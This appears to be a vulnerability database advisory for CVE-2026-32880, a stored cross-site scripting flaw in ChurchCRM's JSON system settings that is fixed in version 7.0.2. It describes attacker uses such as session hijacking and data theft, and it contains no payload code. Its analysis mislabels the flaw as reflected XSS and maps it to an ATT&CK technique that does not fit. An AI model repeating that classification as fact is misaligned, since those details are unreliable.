CVE-2026-32880 in ChurchCRM
Summary
by MITRE • 03/20/2026
ChurchCRM is an open-source church management system. Versions prior to 7.0.2 allow an admin user to edit JSON type system settings to store a JavaScript payload that can execute when any admin views the system settings. The JSON input is left unescaped/unsanitized in SystemSettings.php, leading to XSS. This issue has been fixed in version 7.0.2.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 03/25/2026
The vulnerability CVE-2026-32880 affects ChurchCRM, an open-source church management system that serves religious organizations worldwide for administrative tasks including member management, financial tracking, and event coordination. This system handles sensitive organizational data and is often deployed in environments where trust and data integrity are paramount. The flaw exists in versions prior to 7.0.2 and represents a critical security oversight that could compromise the entire system's integrity and confidentiality.
The technical root cause of this vulnerability lies in the improper handling of JSON input within the SystemSettings.php file. When administrators modify system settings, the application accepts JSON data without adequate sanitization or escaping mechanisms. This creates a cross-site scripting vulnerability where malicious JavaScript code can be injected into the JSON configuration fields. The vulnerability specifically manifests when an admin user edits system settings and inadvertently or maliciously includes JavaScript payload within the JSON structure, which then executes whenever any admin user views the system settings page.
This vulnerability operates under the CWE-79 classification as a cross-site scripting flaw, specifically categorized as reflected XSS in the context of system configuration management. The attack vector is particularly concerning because it leverages the privileged position of admin users to execute arbitrary code within the context of other admin sessions. The vulnerability aligns with ATT&CK technique T1059.007 for JavaScript execution and T1548.001 for privilege escalation through configuration modification. The impact is amplified because the system settings page is typically accessed by authenticated administrators who may have elevated privileges and access to sensitive organizational data.
The operational impact of this vulnerability extends beyond simple code execution, as it can enable attackers to perform session hijacking, steal administrative credentials, modify system configurations, or exfiltrate sensitive church member data. An attacker who successfully exploits this vulnerability could gain full administrative control over the ChurchCRM system, potentially compromising the privacy of church members and the organization's operational integrity. The vulnerability affects not just individual installations but could impact numerous religious organizations that rely on this platform for their digital infrastructure.
Organizations using affected versions of ChurchCRM should immediately upgrade to version 7.0.2 or later, which includes proper input sanitization and escaping mechanisms for JSON data handling. System administrators should also implement additional monitoring of system settings modifications and conduct thorough security audits of their ChurchCRM installations. The fix addresses the core issue by ensuring that all JSON input is properly escaped and sanitized before being rendered in the system settings interface, preventing malicious payloads from executing in the context of other admin users' browsers. Additionally, organizations should review their access control policies and consider implementing multi-factor authentication for administrative accounts to further mitigate potential exploitation risks.